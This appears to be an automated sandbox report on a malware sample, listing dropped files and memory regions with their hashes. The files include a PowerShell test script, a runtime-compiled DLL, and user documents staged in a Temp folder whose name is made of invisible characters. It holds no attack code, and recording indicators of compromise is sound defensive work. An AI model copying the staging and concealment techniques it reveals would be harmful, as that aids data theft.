4f735678b7e38c8e8b693593696f9483cf21f00aea2a6027e908515aa047ec873578c5068354973786e9cfd0d25b7ab1dd6cbb1b97654f202cbb17e233247a61

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_haskkrhn.u3m.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3700_1077516262\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3700_1077516262\e64f23e9-15a9-46f1-addf-3977d3aa3134.tmp

Filesize
135KB

MD5
3f6f93c3dccd4a91c4eb25c7f6feb1c1

SHA1
9b73f46adfa1f4464929b408407e73d4535c6827

SHA256
19f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e

SHA512
d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ykplqxmm\ykplqxmm.dll

Filesize
4KB

MD5
3413da79408d8afa37c782c755af819e

SHA1
89bf6e0fd93e25973bd35c14af5fa5c62ecbb0c6

SHA256
fc3faca144c4c4e22c34d1042de85e2256b848b7f96ae880ce859b2e6ad68565

SHA512
bcfae7b15d0c459b95babd04a01367d13ae9a52e09710993949dcbb9c0b21c946b25a869edbbbb72eef5abb7471570f82b19eed2ba23929e93f35fe509b39492

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Desktop\ApproveComplete.doc

Filesize
506KB

MD5
50417365267f755c70bb8202b1b75b64

SHA1
3b2970ce5ee52e07e2421c4c01869eb90f1a8abc

SHA256
bfa0e14579f5e2f5004f9c6e2c8d6bf48f5d08bdd5106ad4ea8f47e1d26cc78c

SHA512
4f066752938a33daedad5bb8b0519713a8a398278e6608a645730fe3eef09639c64c4244138a0eea20a6ce1bb639bd53ca3ecc5d0b498760a67aa35d76fbb5cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Desktop\CompareAdd.mp4

Filesize
373KB

MD5
8fb7e22c9e8037dac2d4ab27a7b82d59

SHA1
5f19de0039edc8056ef0060d38720780f433429a

SHA256
0a239eaf484767a5ae9eb7a0634ca65a02314e3d0e23f7ffe7a88da968aa050f

SHA512
056b45ceb99faf150c4547f2cf1c74ed1e2930d4677cc5f6dd45cf110b173682b73734da44f42ad4786f629b9f6e01c3c8c759708ab17f4a872664a9a66cc34e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Desktop\ImportMount.xlsx

Filesize
11KB

MD5
a25caf9ae8408f0f24859e72d58873f8

SHA1
740e3cbc4bcfe5e585b32baf99a013424ac3e62b

SHA256
f275cf1f452644af78287af7c700bd8c21dd799fe63b055c4cd20e9b85a31263

SHA512
76769948f27b715bd0418376e7b72d17dbbfacf25e5e3dbb9ddb19fcd1b4110f914b5430cb88c65b750d1e664738e4f420d656835a28e5f0c9abb34c82bcdb0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Desktop\LimitBackup.AAC

Filesize
1.2MB

MD5
a1a8b949f3fc44f6316614560616db76

SHA1
ed6c42f366951b361be7a79c831a3ba583854597

SHA256
6455e08385fdbfdde59a8d3eade7e0be9728fa3294931f60bdf8fa9abb654692

SHA512
ac4cd3fcf71e7cde294ac316bd830e3ca25adece0e28e675d68b077ffedfa867167ec2a9597f1a6c26f7e5d2a26fe965b5edb756baf2230102debfb12fd25ca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Desktop\MoveSave.docx

Filesize
18KB

MD5
5064aac4a9fdfd0e3f66d7c3e062706c

SHA1
b23c3981c84c782d82ca6d8db8771061ce2d59f7

SHA256
0e05cc1a05e63adace11dca9cc7ea294597d8f4d95fb235ed72f100a1d9bf41e

SHA512
07d8fdbe6a21f781e728691d67ec1c3d190ea87c893068d3f2c9e8700bf283d6ae55bbc6123ab98d6dae1c462f883574b474fa2306cf9f3352811a097bf9af8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Desktop\RedoFormat.docx

Filesize
19KB

MD5
5575f9b0a15403c37d4fd10501af8a6a

SHA1
42ceb01e1eecbf88ef0ccf5252cd0a3a54b7f315

SHA256
4a7c5d44056612beb3aba4c5e456651dfa25ddb6e1bbc4b603a7dae9d43341d9

SHA512
bceb9a56b6405768c577b1606c3dc8bf5c342afe058acaae13e993607e0158b470ee8beadaeea4d7cdef4c4051aa8260a8530c62f822a2d1d27c8ba0d159ef8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Desktop\SubmitSync.docx

Filesize
17KB

MD5
964b76058ba42d1428686d4ab6ec7a19

SHA1
3d1f24737666cc12b49e7b0f87481a65272c55b3

SHA256
0a7a09449fd351249eef2ab9bf1f8d75cc9945ed863cf3c6070f7a085d9dee01

SHA512
dce6a21a31cd1d5fd6861ab7916c087394f4b164c9ab0090feaa22965406855565d5979775f065a9e5cdb0b555da1778c555d1ad4caa34e3408f801be8c70796

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Documents\BackupTrace.pdf

Filesize
382KB

MD5
38d20463334601596e9aab85c420c392

SHA1
f50105c04d255c487602577901ad4b7ebbb95e1f

SHA256
98f37e2c83e2e2dd25efe0ca8db85cfac56f3bc2a5faf34e8d26b38b4f4222d1

SHA512
75c6e917412f1c276490d7f543682c8559088debc2682d524ceceafb609eb92c4ddb5e04dea324e8e8e94a7a7f882fda88ff6354eaf3f3ab61c3fed2f1ed5e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Documents\FormatRead.xlsx

Filesize
524KB

MD5
6276485a14939e37250fd319473e206c

SHA1
6f7fb19925fbe89a8d7c5d732d283198e224df5e

SHA256
58c3b19e1b76da004460d6a651842e9a6e98f9208618335d9fc8bfe56e9d4f4d

SHA512
fc3d77257b2c220dec809f423c43c898ed65eca75d5293052b720fb747c71feea66ac22236b30df18c3248aedf236fd3e6ff151c532e42e04aa3388a90340189

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Documents\NewMove.pdf

Filesize
694KB

MD5
c9aaa0b491ff49554c3ab3657f0c9e62

SHA1
9f62d2448530cde56cae53511a2e1642938d6056

SHA256
6a1cd09d5d39d0aa559965c237824dc7290ae28369f01649384a44a3317bd0e7

SHA512
01d65069fdb4014d92f1df46babda48dfbccd4ccd6e09e711f1700627971499cbeee0ee910b854aa68c0ad03a23316682bd1e4deaf039128fe263f452ec78730

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Documents\ShowCopy.pdf

Filesize
311KB

MD5
8852f4ba2d7df36b3c0311c99f516296

SHA1
4122f9182bd8765c17d6d2d7490a1ea1eb8d884a

SHA256
e1e2008da41d134c9b31e3f5f3193bafd0949602f97687aee34ad1963d0c090a

SHA512
2dfc1b41557e8fbe4faa112f73aa2fa4aa1398f8a147ce0183380071aabe66cfb85821f4f1b198683c04e655e48e857133fb61e26a7d1910fb62de5b8ead43a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Documents\ShowLimit.csv

Filesize
666KB

MD5
bbd298b9ace6cd508d36ad71ceabc972

SHA1
ed3af968c4c6fd38207c61faf93228af4c1fe818

SHA256
01a642b3f8cd163bf11ff87de2a9f9d679e46e156534fbeb482a2357c91c76ce

SHA512
95df64fb75b02217f1569965f0287d0302bd687aac1d62071ee93385448f698315ef4b83db1d6b90ea98245afda3adf2c2008e1467793089ab67e0203b6b64d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Documents\SwitchCompare.xlsx

Filesize
11KB

MD5
0b5202c513437f99136fef0b9564df05

SHA1
1215b3a8e571678450e5ca550131bcbd1a80ef5f

SHA256
430924ee7614616ecbf187d70913605a50f790b2f1bb473116c0d0ece7068cf8

SHA512
27f1b7e1722eed7ec785579e5320634113788a3a023a175a0a34adebcff45fbfd985e59f0d4906b059b6774d343fe661df2140db38267176a0323f8dab3f8f15

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ \Common Files\Documents\UndoWait.xls

Filesize
340KB

MD5
fbb8aa07f58c5e9fd1822b7a5717ecca

SHA1
66e579f9641509ee82a3b12cce242636ca26d3b6

SHA256
9745b83c83a6256b7d2b5f70d8d311028c09fcf0cb902fabcf260b32312d99aa

SHA512
61135fc93076765ac2feeaf10dd26c4ffa76a35cd5258972526df72b0196b4d29600ccc6812f14497b3a7c38163f1593938fd3c7cfb910a0b884287a8fe81420

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykplqxmm\CSC1A6C36A19E734926A734DAD3BC39849.TMP

Filesize
652B

MD5
59f5bf65065299da912c72b3c35bc028

SHA1
e751da551752c4f0fabfc083b327157ff3264c79

SHA256
6618bff2198b8208fb7551106e68af3e99792fe5668cfd5dcd53deacb5eabfb8

SHA512
c249393aff53374f20cd0b0889d4bdc49851950959f81acc36f08c269342e9188a21f9798218a08793ba82bc21bdb8bd633b0396d3ff5bfe06b5533319e20801

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykplqxmm\ykplqxmm.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ykplqxmm\ykplqxmm.cmdline

Filesize
607B

MD5
1d00418419dd50f8290f1abbeebe358c

SHA1
46ed8a541e36991972ae8290fe01198a4b514830

SHA256
9553a1814c691505b5f58d661732ff5e89fca80ebe44da4682b540a9c1adb995

SHA512
25c6df5cb9dc4ecd62b450b2c723dbe82ac8d76be6fff601ba895327a4f28a369a9c9ac9846d8639e1bbd280814486cb45bbefeb15c74793b7b6921f886ceb90

Download Submit
memory/1924-99-0x0000027379320000-0x0000027379342000-memory.dmp

Filesize
136KB

Download
memory/2884-197-0x00007FFFDCAD0000-0x00007FFFDCC4A000-memory.dmp

Filesize
1.5MB

Download
memory/2884-58-0x00007FFFE2030000-0x00007FFFE204F000-memory.dmp

Filesize
124KB

Download
memory/2884-331-0x00007FFFDD3D0000-0x00007FFFDD3FC000-memory.dmp

Filesize
176KB

Download
memory/2884-332-0x00007FFFE21B0000-0x00007FFFE21C8000-memory.dmp

Filesize
96KB

Download
memory/2884-333-0x00007FFFE2030000-0x00007FFFE204F000-memory.dmp

Filesize
124KB

Download
memory/2884-334-0x00007FFFDCAD0000-0x00007FFFDCC4A000-memory.dmp

Filesize
1.5MB

Download
memory/2884-335-0x00007FFFE11B0000-0x00007FFFE11C9000-memory.dmp

Filesize
100KB

Download
memory/2884-336-0x00007FFFE14A0000-0x00007FFFE14AD000-memory.dmp

Filesize
52KB

Download
memory/2884-338-0x00007FFFDC9E0000-0x00007FFFDCA98000-memory.dmp

Filesize
736KB

Download
memory/2884-339-0x00007FFFCB370000-0x00007FFFCB6E9000-memory.dmp

Filesize
3.5MB

Download
memory/2884-337-0x00007FFFDCAA0000-0x00007FFFDCACE000-memory.dmp

Filesize
184KB

Download
memory/2884-300-0x00007FFFDFD60000-0x00007FFFDFD84000-memory.dmp

Filesize
144KB

Download
memory/2884-304-0x00007FFFE2030000-0x00007FFFE204F000-memory.dmp

Filesize
124KB

Download
memory/2884-305-0x00007FFFDCAD0000-0x00007FFFDCC4A000-memory.dmp

Filesize
1.5MB

Download
memory/2884-299-0x00007FFFCB6F0000-0x00007FFFCBB56000-memory.dmp

Filesize
4.4MB

Download
memory/2884-280-0x000002D0863D0000-0x000002D086749000-memory.dmp

Filesize
3.5MB

Download
memory/2884-277-0x00007FFFDC9E0000-0x00007FFFDCA98000-memory.dmp

Filesize
736KB

Download
memory/2884-278-0x00007FFFCB370000-0x00007FFFCB6E9000-memory.dmp

Filesize
3.5MB

Download
memory/2884-262-0x00007FFFDCAA0000-0x00007FFFDCACE000-memory.dmp

Filesize
184KB

Download
memory/2884-248-0x00007FFFE11B0000-0x00007FFFE11C9000-memory.dmp

Filesize
100KB

Download
memory/2884-24-0x00007FFFCB6F0000-0x00007FFFCBB56000-memory.dmp

Filesize
4.4MB

Download
memory/2884-314-0x00007FFFCB6F0000-0x00007FFFCBB56000-memory.dmp

Filesize
4.4MB

Download
memory/2884-30-0x00007FFFDFD60000-0x00007FFFDFD84000-memory.dmp

Filesize
144KB

Download
memory/2884-330-0x00007FFFE68E0000-0x00007FFFE68EF000-memory.dmp

Filesize
60KB

Download
memory/2884-76-0x00007FFFDFD40000-0x00007FFFDFD55000-memory.dmp

Filesize
84KB

Download
memory/2884-156-0x00007FFFE2030000-0x00007FFFE204F000-memory.dmp

Filesize
124KB

Download
memory/2884-329-0x00007FFFDFD60000-0x00007FFFDFD84000-memory.dmp

Filesize
144KB

Download
memory/2884-326-0x00007FFFDFD40000-0x00007FFFDFD55000-memory.dmp

Filesize
84KB

Download
memory/2884-78-0x00007FFFDD3D0000-0x00007FFFDD3FC000-memory.dmp

Filesize
176KB

Download
memory/2884-79-0x00007FFFE1420000-0x00007FFFE142D000-memory.dmp

Filesize
52KB

Download
memory/2884-81-0x00007FFFE21B0000-0x00007FFFE21C8000-memory.dmp

Filesize
96KB

Download
memory/2884-82-0x00007FFFDC7A0000-0x00007FFFDC8B8000-memory.dmp

Filesize
1.1MB

Download
memory/2884-71-0x00007FFFDC9E0000-0x00007FFFDCA98000-memory.dmp

Filesize
736KB

Download
memory/2884-73-0x000002D0863D0000-0x000002D086749000-memory.dmp

Filesize
3.5MB

Download
memory/2884-74-0x00007FFFDFD60000-0x00007FFFDFD84000-memory.dmp

Filesize
144KB

Download
memory/2884-72-0x00007FFFCB370000-0x00007FFFCB6E9000-memory.dmp

Filesize
3.5MB

Download
memory/2884-70-0x00007FFFCB6F0000-0x00007FFFCBB56000-memory.dmp

Filesize
4.4MB

Download
memory/2884-66-0x00007FFFDCAA0000-0x00007FFFDCACE000-memory.dmp

Filesize
184KB

Download
memory/2884-64-0x00007FFFE14A0000-0x00007FFFE14AD000-memory.dmp

Filesize
52KB

Download
memory/2884-62-0x00007FFFE11B0000-0x00007FFFE11C9000-memory.dmp

Filesize
100KB

Download
memory/2884-60-0x00007FFFDCAD0000-0x00007FFFDCC4A000-memory.dmp

Filesize
1.5MB

Download
memory/2884-327-0x00007FFFE1420000-0x00007FFFE142D000-memory.dmp

Filesize
52KB

Download
memory/2884-56-0x00007FFFE21B0000-0x00007FFFE21C8000-memory.dmp

Filesize
96KB

Download
memory/2884-54-0x00007FFFDD3D0000-0x00007FFFDD3FC000-memory.dmp

Filesize
176KB

Download
memory/2884-32-0x00007FFFE68E0000-0x00007FFFE68EF000-memory.dmp

Filesize
60KB

Download
memory/2884-328-0x00007FFFDC7A0000-0x00007FFFDC8B8000-memory.dmp

Filesize
1.1MB

Download
memory/4540-199-0x0000021C6D4E0000-0x0000021C6D4E8000-memory.dmp

Filesize
32KB

Download